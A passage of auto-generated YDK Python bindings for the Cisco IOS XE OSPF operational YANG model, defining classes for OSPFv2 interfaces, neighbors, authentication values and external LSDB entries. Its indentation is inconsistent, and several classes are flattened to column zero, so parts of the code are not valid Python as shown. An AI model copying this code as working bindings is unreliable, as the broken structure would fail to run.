            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa.ExternalTopo, ['mt_id', 'topo_metric_type', 'topo_metric', 'topo_forwarding_address', 'topo_route_tag'], name, value)
class Ospfv2Interface(Entity):
"""
A list of interfaces that belong to the area
.. attribute:: name (key)
Name of the interface
**type**\: str
**config**\: False
.. attribute:: network_type
Network type
**type**\: :py:class:`OspfNetworkType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfNetworkType>`
**config**\: False
.. attribute:: enable
If the interface is enabled
**type**\: bool
**config**\: False
.. attribute:: passive
If the interface is in passive mode
**type**\: bool
**config**\: False
.. attribute:: demand_circuit
If this is a demand circuit
**type**\: bool
**config**\: False
.. attribute:: mtu_ignore
If the MTU is being ignored
**type**\: bool
**config**\: False
.. attribute:: prefix_suppresion
If prefix suppression is enabled
**type**\: bool
**config**\: False
.. attribute:: cost
The OSPFv2 cost
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: hello_interval
The hello interval in seconds
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: dead_interval
The dead interval in seconds
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: retransmit_interval
The retransmit interval in seconds
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: transmit_delay
The delay before transmitting a keepalive in seconds
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: hello_timer
The current hello timer in seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: wait_timer
The wait timer in seconds
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: dr
The designated router identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: bdr
The backup designated router identifier
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: dr_ip
The address of the designated router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bdr_ip
The address of the backup designated router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: state
The current state of the interface
**type**\: :py:class:`Ospfv2IntfState <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2IntfState>`
**config**\: False
.. attribute:: ttl_security_val
The TTL security information
**type**\: :py:class:`TtlSecurityVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal>`
**config**\: False
.. attribute:: auth_val
The authentication information
**type**\: :py:class:`AuthVal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal>`
**config**\: False
.. attribute:: ospfv2_neighbor
All the neighbors on the interface
**type**\: list of :py:class:`Ospfv2Neighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor>`
**config**\: False
"""
# YANG module prefix and revision this binding was generated from.
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    """Initialize the ospfv2-interface list entry: YANG metadata, leaf descriptors, child containers and defaults."""
    super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, self).__init__()

    self.yang_name = "ospfv2-interface"   # YANG node name of this list
    self.yang_parent_name = "ospfv2-area" # enclosing YANG container
    self.is_top_level_class = False
    self.has_list_ancestor = True
    # This list entry is keyed by the interface name.
    self.ylist_key_names = ['name']
    # Child containers/lists reachable from this node: YANG name -> (python attr, class).
    self._child_classes = OrderedDict([("ttl-security-val", ("ttl_security_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal)), ("auth-val", ("auth_val", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal)), ("ospfv2-neighbor", ("ospfv2_neighbor", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor))])
    # Leaf descriptors: python attribute -> (YLeaf with YANG type/name, accepted
    # python types). dr-ip/bdr-ip are string unions (IPv4 or IPv6 textual form),
    # hence the two accepted 'str' entries.
    self._leafs = OrderedDict([
        ('name', (YLeaf(YType.str, 'name'), ['str'])),
        ('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])),
        ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
        ('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])),
        ('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])),
        ('mtu_ignore', (YLeaf(YType.boolean, 'mtu-ignore'), ['bool'])),
        ('prefix_suppresion', (YLeaf(YType.boolean, 'prefix-suppresion'), ['bool'])),
        ('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
        ('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])),
        ('dead_interval', (YLeaf(YType.uint16, 'dead-interval'), ['int'])),
        ('retransmit_interval', (YLeaf(YType.uint16, 'retransmit-interval'), ['int'])),
        ('transmit_delay', (YLeaf(YType.uint16, 'transmit-delay'), ['int'])),
        ('hello_timer', (YLeaf(YType.uint32, 'hello-timer'), ['int'])),
        ('wait_timer', (YLeaf(YType.uint32, 'wait-timer'), ['int'])),
        ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])),
        ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])),
        ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])),
        ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])),
        ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2IntfState', '')])),
    ])

    # Leaf values start unset (None).
    # NOTE: 'prefix_suppresion' misspells "suppression", but it mirrors the
    # YANG leaf name 'prefix-suppresion' and is part of the public interface,
    # so it must not be renamed here.
    self.name = None
    self.network_type = None
    self.enable = None
    self.passive = None
    self.demand_circuit = None
    self.mtu_ignore = None
    self.prefix_suppresion = None
    self.cost = None
    self.hello_interval = None
    self.dead_interval = None
    self.retransmit_interval = None
    self.transmit_delay = None
    self.hello_timer = None
    self.wait_timer = None
    self.dr = None
    self.bdr = None
    self.dr_ip = None
    self.bdr_ip = None
    self.state = None

    # Singleton child containers, parented to this node and registered in
    # _children_name_map under their YANG names.
    self.ttl_security_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal()
    self.ttl_security_val.parent = self
    self._children_name_map["ttl_security_val"] = "ttl-security-val"

    self.auth_val = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal()
    self.auth_val.parent = self
    self._children_name_map["auth_val"] = "auth-val"

    # Keyed child list of neighbors on this interface.
    self.ospfv2_neighbor = YList(self)

    # Relative XPath segment for this entry, including the name key predicate.
    self._segment_path = lambda: "ospfv2-interface" + "[name='" + str(self.name) + "']"
    # Keep last; freezing presumably blocks further attribute creation
    # (NOTE(review): confirm against the ydk Entity base class).
    self._is_frozen = True
def __setattr__(self, name, value):
    # Delegate every attribute write to the YDK validator, declaring the
    # leaf attributes that belong to this node.
    self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface, ['name', 'network_type', 'enable', 'passive', 'demand_circuit', 'mtu_ignore', 'prefix_suppresion', 'cost', 'hello_interval', 'dead_interval', 'retransmit_interval', 'transmit_delay', 'hello_timer', 'wait_timer', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'state'], name, value)
class TtlSecurityVal(Entity):
    """
    The TTL security information.

    .. attribute:: enable

        Indicates whether time to live security is enabled

        **type**\: bool

        **config**\: False

    .. attribute:: hops

        Number of hops for time to live security

        **type**\: int

        **range:** \-2147483648..2147483647

        **config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize the ttl-security-val node: YANG metadata, leaf descriptors and defaults."""
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, self).__init__()

        self.yang_name = "ttl-security-val"
        self.yang_parent_name = "ospfv2-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []               # unkeyed node
        self._child_classes = OrderedDict([])   # leaf-only node
        # Leaf descriptors: python attribute -> (YLeaf, accepted python types).
        self._leafs = OrderedDict([
            ('enable', (YLeaf(YType.boolean, 'enable'), ['bool'])),
            ('hops', (YLeaf(YType.int32, 'hops'), ['int'])),
        ])
        self.enable = None
        self.hops = None

        self._segment_path = lambda: "ttl-security-val"   # relative XPath segment
        self._is_frozen = True                            # keep last; see Entity freeze semantics

    def __setattr__(self, name, value):
        # Route all writes through the YDK validator with this node's leaf names.
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.TtlSecurityVal, ['enable', 'hops'], name, value)
class AuthVal(Entity):
"""
The authentication information
.. attribute:: no_auth
No authentication in use
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: auth_key
Trailer key chain information
**type**\: :py:class:`AuthKey <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey>`
**config**\: False
.. attribute:: key_chain
Trailer key information
**type**\: :py:class:`KeyChain <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain>`
**config**\: False
"""
# YANG module prefix and revision this binding was generated from.
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'

def __init__(self):
    """Initialize the auth-val node: YANG metadata, leaf descriptors, child containers and defaults."""
    super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, self).__init__()

    self.yang_name = "auth-val"
    self.yang_parent_name = "ospfv2-interface"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []   # unkeyed node
    # Child containers reachable from this node: YANG name -> (python attr, class).
    self._child_classes = OrderedDict([("auth-key", ("auth_key", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey)), ("key-chain", ("key_chain", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain))])
    # Single leaf descriptor (no-auth marker).
    self._leafs = OrderedDict([
        ('no_auth', (YLeaf(YType.uint32, 'no-auth'), ['int'])),
    ])
    self.no_auth = None   # unset

    # Singleton child containers, parented to this node and registered in
    # _children_name_map under their YANG names.
    self.auth_key = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey()
    self.auth_key.parent = self
    self._children_name_map["auth_key"] = "auth-key"

    self.key_chain = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain()
    self.key_chain.parent = self
    self._children_name_map["key_chain"] = "key-chain"

    self._segment_path = lambda: "auth-val"   # relative XPath segment
    self._is_frozen = True                    # keep last; see Entity freeze semantics
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal, ['no_auth'], name, value)
class AuthKey(Entity):
"""
Trailer key chain information
.. attribute:: key_id
The key identifier
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: key_string
The key string
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: crypto_algo
The algorithm in use
**type**\: :py:class:`Ospfv2CryptoAlgorithm <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2CryptoAlgorithm>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, self).__init__()
self.yang_name = "auth-key"
self.yang_parent_name = "auth-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_id', (YLeaf(YType.uint8, 'key-id'), ['int'])),
('key_string', (YLeafList(YType.uint8, 'key-string'), ['int'])),
('crypto_algo', (YLeaf(YType.enumeration, 'crypto-algo'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'Ospfv2CryptoAlgorithm', '')])),
])
self.key_id = None
self.key_string = []
self.crypto_algo = None
self._segment_path = lambda: "auth-key"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.AuthKey, ['key_id', 'key_string', 'crypto_algo'], name, value)
class KeyChain(Entity):
"""
Trailer key information
.. attribute:: key_chain
The key chain
**type**\: list of int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, self).__init__()
self.yang_name = "key-chain"
self.yang_parent_name = "auth-val"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('key_chain', (YLeafList(YType.uint8, 'key-chain'), ['int'])),
])
self.key_chain = []
self._segment_path = lambda: "key-chain"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.AuthVal.KeyChain, ['key_chain'], name, value)
class Ospfv2Neighbor(Entity):
    """
    All the neighbors on the interface (YANG list keyed by ``nbr_id``).

    Key:

    .. attribute:: nbr_id (key)

        The neighbor identifier.  **type**\: int, **range:** 0..4294967295

    Operational leaves (all config false):

    .. attribute:: address

        Neighbor address (IPv4 or IPv6 dotted/colon string).  **type**\: str

    .. attribute:: dr

        The neighbor's Designated Router identifier.  **type**\: int (uint32)

    .. attribute:: bdr

        The neighbor's Backup Designated Router identifier.  **type**\: int (uint32)

    .. attribute:: dr_ip

        The designated router's IP address (IPv4 or IPv6 string).  **type**\: str

    .. attribute:: bdr_ip

        The backup designated router's IP address (IPv4 or IPv6 string).  **type**\: str

    .. attribute:: event_count

        A count of neighbor events.  **type**\: int (uint32)

    .. attribute:: retrans_count

        A count of the retransmission events.  **type**\: int (uint32)

    .. attribute:: state

        The current neighbor state.
        **type**\: :py:class:`NbrStateType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.NbrStateType>`

    .. attribute:: dead_timer

        The dead timer in seconds.  **type**\: int (uint32)
    """

    # Auto-generated YDK model binding for the YANG list "ospfv2-neighbor".
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, self).__init__()

        self.yang_name = "ospfv2-neighbor"
        self.yang_parent_name = "ospfv2-interface"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # List key(s) used to build this entry's XPath segment.
        self.ylist_key_names = ['nbr_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('nbr_id', (YLeaf(YType.uint32, 'nbr-id'), ['int'])),
            ('address', (YLeaf(YType.str, 'address'), ['str','str'])),
            ('dr', (YLeaf(YType.uint32, 'dr'), ['int'])),
            ('bdr', (YLeaf(YType.uint32, 'bdr'), ['int'])),
            ('dr_ip', (YLeaf(YType.str, 'dr-ip'), ['str','str'])),
            ('bdr_ip', (YLeaf(YType.str, 'bdr-ip'), ['str','str'])),
            ('event_count', (YLeaf(YType.uint32, 'event-count'), ['int'])),
            ('retrans_count', (YLeaf(YType.uint32, 'retrans-count'), ['int'])),
            ('state', (YLeaf(YType.enumeration, 'state'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'NbrStateType', '')])),
            ('dead_timer', (YLeaf(YType.uint32, 'dead-timer'), ['int'])),
        ])
        self.nbr_id = None
        self.address = None
        self.dr = None
        self.bdr = None
        self.dr_ip = None
        self.bdr_ip = None
        self.event_count = None
        self.retrans_count = None
        self.state = None
        self.dead_timer = None

        # Segment path embeds the current key value, hence the lambda.
        self._segment_path = lambda: "ospfv2-neighbor" + "[nbr-id='" + str(self.nbr_id) + "']"
        # Must stay last: enables validated attribute assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface.Ospfv2Neighbor, ['nbr_id', 'address', 'dr', 'bdr', 'dr_ip', 'bdr_ip', 'event_count', 'retrans_count', 'state', 'dead_timer'], name, value)
class Ospfv2LsdbExternal(Entity):
    """
    The external LSDB information (YANG list keyed by ``lsa_type``,
    ``lsa_id`` and ``advertising_router``).

    Keys:

    .. attribute:: lsa_type (key)

        Link State Advertisement type.  **type**\: int, **range:** 0..255

    .. attribute:: lsa_id (key)

        Link State Advertisement Identifier.  **type**\: int (uint32)

    .. attribute:: advertising_router (key)

        Advertising router.  **type**\: int (uint32)

    Operational leaves (all config false):

    .. attribute:: lsa_age

        The age of the Link State Advertisement.  **type**\: int (uint16)

    .. attribute:: lsa_options

        The options of the Link State Advertisement.
        **type**\: :py:class:`Ospfv2LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2LsaFlagOptions>`

    .. attribute:: lsa_seq_number

        The sequence number for the Link State Advertisement.  **type**\: int (uint32)

    .. attribute:: lsa_checksum

        The checksum of the Link State Advertisement.  **type**\: int (uint16)

    .. attribute:: lsa_length

        The length, in bytes, of the Link State Advertisement.  **type**\: int (uint16)

    Child nodes:

    .. attribute:: ospfv2_router_lsa_links

        The router Link State Advertisement links (list of
        :py:class:`Ospfv2RouterLsaLinks`).

    .. attribute:: unsupported_lsa

        The unsupported Link State Advertisements (:py:class:`UnsupportedLsa`).

    .. attribute:: router_lsa

        The router Link State Advertisements (:py:class:`RouterLsa`).

    .. attribute:: network_lsa

        The network Link State Advertisements (:py:class:`NetworkLsa`).

    .. attribute:: network_summary_lsa

        The network summary Link State Advertisements (:py:class:`NetworkSummaryLsa`).

    .. attribute:: router_summary_lsa

        The router summary Link State Advertisements (:py:class:`RouterSummaryLsa`).

    .. attribute:: external_lsa

        The external Link State Advertisements (:py:class:`ExternalLsa`).

    .. attribute:: nssa_lsa

        The Not So Stubby Area Link State Advertisements (:py:class:`NssaLsa`).
    """

    # Auto-generated YDK model binding for the YANG list "ospfv2-lsdb-external".
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, self).__init__()

        self.yang_name = "ospfv2-lsdb-external"
        self.yang_parent_name = "ospfv2-instance"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        # List key(s) used to build this entry's XPath segment.
        self.ylist_key_names = ['lsa_type','lsa_id','advertising_router']
        # Child container/list registry: YANG name -> (python attribute, class).
        self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa))])
        self._leafs = OrderedDict([
            ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])),
            ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])),
            ('advertising_router', (YLeaf(YType.uint32, 'advertising-router'), ['int'])),
            ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])),
            ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])),
            ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])),
            ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])),
            ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])),
        ])
        self.lsa_type = None
        self.lsa_id = None
        self.advertising_router = None
        self.lsa_age = None
        self.lsa_options = Bits()
        self.lsa_seq_number = None
        self.lsa_checksum = None
        self.lsa_length = None

        # Child containers are instantiated eagerly and parented to self.
        self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa()
        self.unsupported_lsa.parent = self
        self._children_name_map["unsupported_lsa"] = "unsupported-lsa"

        self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa()
        self.router_lsa.parent = self
        self._children_name_map["router_lsa"] = "router-lsa"

        self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkLsa()
        self.network_lsa.parent = self
        self._children_name_map["network_lsa"] = "network-lsa"

        self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NetworkSummaryLsa()
        self.network_summary_lsa.parent = self
        self._children_name_map["network_summary_lsa"] = "network-summary-lsa"

        self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterSummaryLsa()
        self.router_summary_lsa.parent = self
        self._children_name_map["router_summary_lsa"] = "router-summary-lsa"

        self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.ExternalLsa()
        self.external_lsa.parent = self
        self._children_name_map["external_lsa"] = "external-lsa"

        self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.NssaLsa()
        self.nssa_lsa.parent = self
        self._children_name_map["nssa_lsa"] = "nssa-lsa"

        self.ospfv2_router_lsa_links = YList(self)
        # Segment path embeds the current key values, hence the lambda.
        self._segment_path = lambda: "ospfv2-lsdb-external" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + "']" + "[advertising-router='" + str(self.advertising_router) + "']"
        # Must stay last: enables validated attribute assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value)


    class Ospfv2RouterLsaLinks(Entity):
        """
        The router Link State Advertisement links (YANG list keyed by
        ``link_type``, ``link_id`` and ``link_data``).

        .. attribute:: link_type (key)

            Link type.  **type**\: int, **range:** 0..255

        .. attribute:: link_id (key)

            Link identifier.  **type**\: int (uint32)

        .. attribute:: link_data (key)

            Link data.  **type**\: int (uint32)

        .. attribute:: link_topo

            Link topology (list of :py:class:`LinkTopo`).  **config**\: False
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, self).__init__()

            self.yang_name = "ospfv2-router-lsa-links"
            self.yang_parent_name = "ospfv2-lsdb-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['link_type','link_id','link_data']
            self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo))])
            self._leafs = OrderedDict([
                ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
                ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
                ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ])
            self.link_type = None
            self.link_id = None
            self.link_data = None

            self.link_topo = YList(self)
            # Segment path embeds the current key values, hence the lambda.
            self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
            # Must stay last: enables validated attribute assignment.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value)


        class LinkTopo(Entity):
            """
            Link topology.

            .. attribute:: mt_id

                Multi topology identifier.  **type**\: int, **range:** 0..255

            .. attribute:: topo_metric

                Topology metric.  **type**\: int (uint16)
            """

            _prefix = 'ospf-ios-xe-oper'
            _revision = '2018-02-01'

            def __init__(self):
                super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, self).__init__()

                self.yang_name = "link-topo"
                self.yang_parent_name = "ospfv2-router-lsa-links"
                self.is_top_level_class = False
                self.has_list_ancestor = True
                self.ylist_key_names = []
                self._child_classes = OrderedDict([])
                self._leafs = OrderedDict([
                    ('mt_id', (YLeaf(YType.uint8, 'mt-id'), ['int'])),
                    ('topo_metric', (YLeaf(YType.uint16, 'topo-metric'), ['int'])),
                ])
                self.mt_id = None
                self.topo_metric = None
                self._segment_path = lambda: "link-topo"
                # Must stay last: enables validated attribute assignment.
                self._is_frozen = True

            def __setattr__(self, name, value):
                self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.Ospfv2RouterLsaLinks.LinkTopo, ['mt_id', 'topo_metric'], name, value)


    class UnsupportedLsa(Entity):
        """
        The unsupported Link State Advertisements.

        .. attribute:: lsa_data

            Link State Advertisement data.  **type**\: list of int,
            **range:** 0..255
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, self).__init__()

            self.yang_name = "unsupported-lsa"
            self.yang_parent_name = "ospfv2-lsdb-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('lsa_data', (YLeafList(YType.uint8, 'lsa-data'), ['int'])),
            ])
            self.lsa_data = []
            self._segment_path = lambda: "unsupported-lsa"
            # Must stay last: enables validated attribute assignment.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.UnsupportedLsa, ['lsa_data'], name, value)


    class RouterLsa(Entity):
        """
        The router Link State Advertisements.

        .. attribute:: router_lsa_bits

            Router Link State Advertisement bits.
            **type**\: :py:class:`Ospfv2RouterLsaBits <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv2RouterLsaBits>`

        .. attribute:: router_lsa_number_links

            Router Link State Advertisement number of links.
            **type**\: int (uint16)
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, self).__init__()

            self.yang_name = "router-lsa"
            self.yang_parent_name = "ospfv2-lsdb-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('router_lsa_bits', (YLeaf(YType.bits, 'router-lsa-bits'), ['Bits'])),
                ('router_lsa_number_links', (YLeaf(YType.uint16, 'router-lsa-number-links'), ['int'])),
            ])
            self.router_lsa_bits = Bits()
            self.router_lsa_number_links = None
            self._segment_path = lambda: "router-lsa"
            # Must stay last: enables validated attribute assignment.
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal.RouterLsa, ['router_lsa_bits', 'router_lsa_number_links'], name, value)


    class NetworkLsa(Entity):
        """
